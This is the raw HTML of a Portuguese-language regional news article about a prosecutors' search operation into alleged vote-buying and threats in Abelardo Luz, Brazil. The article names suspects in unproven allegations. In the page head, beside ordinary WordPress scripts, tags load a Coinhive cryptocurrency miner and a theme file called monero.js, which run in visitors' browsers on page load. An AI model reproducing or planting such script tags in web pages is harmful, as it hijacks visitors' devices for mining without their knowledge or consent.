

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

	<!-- This site is optimized with the Yoast SEO plugin v14.9 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ - O Iguassu</title>
	<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
	<link rel="canonical" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ - O Iguassu" />
	<meta property="og:description" content="A Operação foi comanda pelo Ministério Público de Santa Catarina,..." />
	<meta property="og:url" content="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/" />
	<meta property="og:site_name" content="O Iguassu" />
	<meta property="article:published_time" content="2020-11-15T08:10:00+00:00" />
	<meta property="article:modified_time" content="2020-11-15T14:27:43+00:00" />
	<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2020/11/trio-1.jpg" />
	<meta property="og:image:width" content="891" />
	<meta property="og:image:height" content="412" />
	<meta name="twitter:card" content="summary_large_image" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://oiguassu.com/#website","url":"http://oiguassu.com/","name":"Oiguassu","description":"Not&iacute;cias para a Tr&iacute;plice Fronteira","potentialAction":[{"@type":"SearchAction","target":"http://oiguassu.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/#primaryimage","inLanguage":"pt-BR","url":"http://oiguassu.com/wp-content/uploads/2020/11/trio-1.jpg","width":891,"height":412},{"@type":"WebPage","@id":"http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/#webpage","url":"http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/","name":"Compra de Votos: OPERA\u00c7\u00c3O INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO \u201cMARIONETE\u201d CAVALCANTI E SID ORLANDO EM ABELARDO LUZ - O Iguassu","isPartOf":{"@id":"http://oiguassu.com/#website"},"primaryImageOfPage":{"@id":"http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/#primaryimage"},"datePublished":"2020-11-15T08:10:00+00:00","dateModified":"2020-11-15T14:27:43+00:00","author":{"@id":"http://oiguassu.com/#/schema/person/1d041553b5df955921650ef8aff3cd06"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/"]}]},{"@type":"Person","@id":"http://oiguassu.com/#/schema/person/1d041553b5df955921650ef8aff3cd06","name":"admin","image":{"@type":"ImageObject","@id":"http://oiguassu.com/#personlogo","inLanguage":"pt-BR","url":"http://1.gravatar.com/avatar/720ba8469fe039789215358cbb933434?s=96&d=mm&r=g","caption":"admin"}}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para O Iguassu &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para O Iguassu &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para O Iguassu &raquo; Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://oiguassu.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1599656572' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='global-styles-inline-css' type='text/css'>
:root {
	--wp--preset--color--black: #000000;
	--wp--preset--color--cyan-bluish-gray: #abb8c3;
	--wp--preset--color--light-green-cyan: #7bdcb5;
	--wp--preset--color--luminous-vivid-amber: #fcb900;
	--wp--preset--color--luminous-vivid-orange: #ff6900;
	--wp--preset--color--pale-cyan-blue: #8ed1fc;
	--wp--preset--color--pale-pink: #f78da7;
	--wp--preset--color--vivid-cyan-blue: #0693e3;
	--wp--preset--color--vivid-green-cyan: #00d084;
	--wp--preset--color--vivid-purple: #9b51e0;
	--wp--preset--color--vivid-red: #cf2e2e;
	--wp--preset--color--white: #ffffff;
	--wp--preset--font-size--small: 13;
	--wp--preset--font-size--normal: 16;
	--wp--preset--font-size--medium: 20;
	--wp--preset--font-size--large: 36;
	--wp--preset--font-size--huge: 48;
	--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);
	--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);
	--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);
	--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);
	--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);
	--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);
	--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);
	--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);
	--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);
	--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);
	--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);
	--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);
}

</style>
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=8.9.1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=8.9.1' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script>
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20191011' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=5.5.3' id='mh-scripts-js'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=5.5.3' id='monero-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=5.5.3' id='monero2-js'></script>
<link rel="https://api.w.org/" href="http://oiguassu.com/wp-json/" /><link rel="alternate" type="application/json" href="http://oiguassu.com/wp-json/wp/v2/posts/26698" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.5.3" />
<link rel='shortlink' href='https://wp.me/pS5BS-6WC' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fcompra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fcompra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><link rel="amphtml" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/amp/"><link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
			<style type="text/css" id="wp-custom-css">
				.logo-wrap img{
	width:100%
}			</style>
		</head>
<body class="post-template-default single single-post postid-26698 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="O Iguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2020/08/cropped-O-IGUASSU-Cartão-Front-1064-x-451-v2.jpg" height="338" width="1064" alt="O Iguassu" />
<div class="logo">
<h1 class="logo-title">O Iguassu</h1>
<h2 class="logo-tagline">Not&iacute;cias para a Tr&iacute;plice Fronteira</h2>
</div>
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/extra-extra-extra-leonardo-cavalcante-devera-ter-candidatura-a-vereador-impugnada/" title="Extra, Extra, Extra: LEONARDO CAVALCANTE DEVERÁ TER CANDIDATURA A VEREADOR IMPUGNADA">
					<span class="ticker-item-date">novembro 15, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Extra, Extra, Extra: LEONARDO CAVALCANTE DEVERÁ TER CANDIDATURA A VEREADOR IMPUGNADA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/politica-abelardo-luz-uma-bela-cidade-e-atenta-3/" title="Política: ABELARDO LUZ, UMA BELA CIDADE, E ATENTA">
					<span class="ticker-item-date">novembro 15, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Política: ABELARDO LUZ, UMA BELA CIDADE, E ATENTA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/" title="Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ">
					<span class="ticker-item-date">novembro 15, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/extra-extra-extra-justica-impoe-derrota-aos-2-parcas-de-abelardo/" title="Extra, Extra, Extra: JUSTIÇA IMPÕE DERROTA AOS 2 “PARÇAS” DE ABELARDO">
					<span class="ticker-item-date">novembro 14, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Extra, Extra, Extra: JUSTIÇA IMPÕE DERROTA AOS 2 “PARÇAS” DE ABELARDO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/ore-por-seu-irmao/" title="ORE POR SEU IRMÃO">
					<span class="ticker-item-date">novembro 13, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">ORE POR SEU IRMÃO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/politica-abelardo-luz-uma-bela-cidade-e-atenta-2/" title="Política: ABELARDO LUZ, UMA BELA CIDADE, E ATENTA">
					<span class="ticker-item-date">novembro 12, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Política: ABELARDO LUZ, UMA BELA CIDADE, E ATENTA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/faca-bons-planos-com-a-ajuda-de-deus/" title="FAÇA BONS PLANOS COM A AJUDA DE DEUS">
					<span class="ticker-item-date">novembro 12, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">FAÇA BONS PLANOS COM A AJUDA DE DEUS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/escolha-perdoar/" title="ESCOLHA PERDOAR">
					<span class="ticker-item-date">novembro 11, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">ESCOLHA PERDOAR</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/olhe-para-jesus/" title="OLHE PARA JESUS">
					<span class="ticker-item-date">novembro 10, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">OLHE PARA JESUS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/pais-e-filhos/" title="PAIS E FILHOS">
					<span class="ticker-item-date">novembro 9, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">PAIS E FILHOS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/deus-sempre-acrescenta-mais/" title="DEUS SEMPRE ACRESCENTA MAIS">
					<span class="ticker-item-date">novembro 8, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">DEUS SEMPRE ACRESCENTA MAIS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/o-que-e-um-sacrificio-de-louvor/" title="O QUE É UM SACRIFÍCIO DE LOUVOR?">
					<span class="ticker-item-date">novembro 7, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">O QUE É UM SACRIFÍCIO DE LOUVOR?</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/a-fonte-da-sabedoria/" title="A FONTE DA SABEDORIA">
					<span class="ticker-item-date">novembro 6, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">A FONTE DA SABEDORIA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/voce-precisa-de-um-transplante-de-coracao/" title="VOCÊ PRECISA DE UM TRANSPLANTE DE CORAÇÃO">
					<span class="ticker-item-date">novembro 5, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">VOCÊ PRECISA DE UM TRANSPLANTE DE CORAÇÃO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/uma-oracao-maravilhosa-num-ambiente-de-dor/" title="UMA ORAÇÃO MARAVILHOSA NUM AMBIENTE DE DOR">
					<span class="ticker-item-date">novembro 4, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">UMA ORAÇÃO MARAVILHOSA NUM AMBIENTE DE DOR</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/politica/" itemprop="url"><span itemprop="title">Política</span></a></span></nav>
<article id="post-26698" class="post-26698 post type-post status-publish format-standard has-post-thumbnail hentry category-politica category-ultima-hora">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="777" height="412" src="http://oiguassu.com/wp-content/uploads/2020/11/trio-1-777x412.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" loading="lazy" data-attachment-id="26703" data-permalink="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/trio-2/" data-orig-file="http://oiguassu.com/wp-content/uploads/2020/11/trio-1.jpg" data-orig-size="891,412" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="trio" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2020/11/trio-1-300x139.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2020/11/trio-1.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/admin/">admin</a></span>
<span class="entry-meta-date updated">novembro 15, 2020</span>
</p>
	<div class="entry-content clearfix">
		<!--CusAdsVi1--><h3 class="western" style="text-align: justify;" align="left"><b>A Operação foi comanda pelo Ministério Público de Santa Catarina, com o apoio de força policial. Durante as buscas, as autoridades localizaram em companhia de “Sid” Orlando e Leonardo “Marionete”, um indivíduo conhecido como Traveco. A apuração é sobre compra de votos e ameaças nas eleições de Abelardo Luz.</b></h3>
<p class="western" align="justify">O <b>Ministério Público, </b><b>com apoio de forças policiais,</b><b> após receber diversas denúncias relacionadas a crimes de ameaça e compra de votos </b><b>nestas eleições em Abelardo Luz</b>, deflagrou na tarde da sexta-feira (13). A operação deu cumprimento a mandados de busca e apreensão contra <b>os</b><b> alvo</b><b>s</b><b> da ação, Leonardo</b><b> “Marionete” Cavalcante,</b><b> </b><b>candidato a vereador, </b><b>e </b><b>Sidnei “Sid” Orlando. </b></p>
<p style="text-align: justify;" align="justify">O <strong>alvos, segundos fontes do O IGUASSU, seriam &#8220;alicerces&#8221; da candidatura do petista Dilmar Fantinelli (na foto principal da matéria com &#8220;Sid&#8221; e Leonardo)</strong>&nbsp; a prefeito de Abelardo Luz.</p>
<p class="western" align="justify">Os <b>“2 Parças”, como são conhecidos Leonardo “Marionete” e “Sid” Orlando,</b> estariam sendo, segundo as autoridades, <b>“alvos” da Operação Integrada, por possíveis </b><b>delitos de ameaças e compra votos n</b><b>o</b><b> </b><b>município. </b>Nas buscas, as autoridades teriam localizado<b> com os dois “alvos” da ação, Traveco (chamado Cleber Sansigolo), de quem também teria sido apreendido o celular.</b></p>
<h3 align="justify"><span style="color: #333333;"><strong>DIVULGADO VÍDEO PARÓDIA DA OPERAÇÃO CONTRA OS &#8220;2 PARÇAS&#8221; DE ABELARDO. ASSISTA:</strong></span></h3>
<div style="width: 400px;" class="wp-video"><!--[if lt IE 9]><script>document.createElement('video');</script><![endif]-->
<video class="wp-video-shortcode" id="video-26698-1" width="400" height="224" preload="metadata" controls="controls"><source type="video/mp4" src="http://oiguassu.com/wp-content/uploads/2020/11/WhatsApp-Video-2020-11-14-at-15.58.37.mp4?_=1" /><a href="http://oiguassu.com/wp-content/uploads/2020/11/WhatsApp-Video-2020-11-14-at-15.58.37.mp4">http://oiguassu.com/wp-content/uploads/2020/11/WhatsApp-Video-2020-11-14-at-15.58.37.mp4</a></video></div>
<p class="western" align="justify">De acordo com as informações publicadas pelo departamento de jornalismo do Ronda Policial, os alvos foram localizados no apartamento de “Sid” Orlando.</p>
<p class="western" align="justify">O imóvel de “Sid” Orlando, segundo <b>O IGUASSU</b> apurou com suas fontes em Abelardo Luz, também seria utilizado como morada de Leonardo “Marionete” Cavalcante, onde estavam os dois quando da Operação Integrada, em companhia do tal Traveco.</p>
<p class="western" align="justify">Os três, “Sid”, Leonardo e o Traveco, teriam tido seus aparelhos celulares apreendidos para análise e averiguação por parte das autoridades. Na oportunidade também documentos e computadores foram apreendidos.</p>
<p class="western" align="justify">Desde já, o <b>O IGUASSU</b> disponibiliza este espaço digital para o eventual interesse de utilização de direito de resposta, por parte do Traveco, de “Sid” Orlando e de Leonardo “Marionete” Cavalcante.</p>
<h6 class="western" style="text-align: right;" align="justify">(Da Redação do O IGUASSU com o Ronda Policial)</h6>

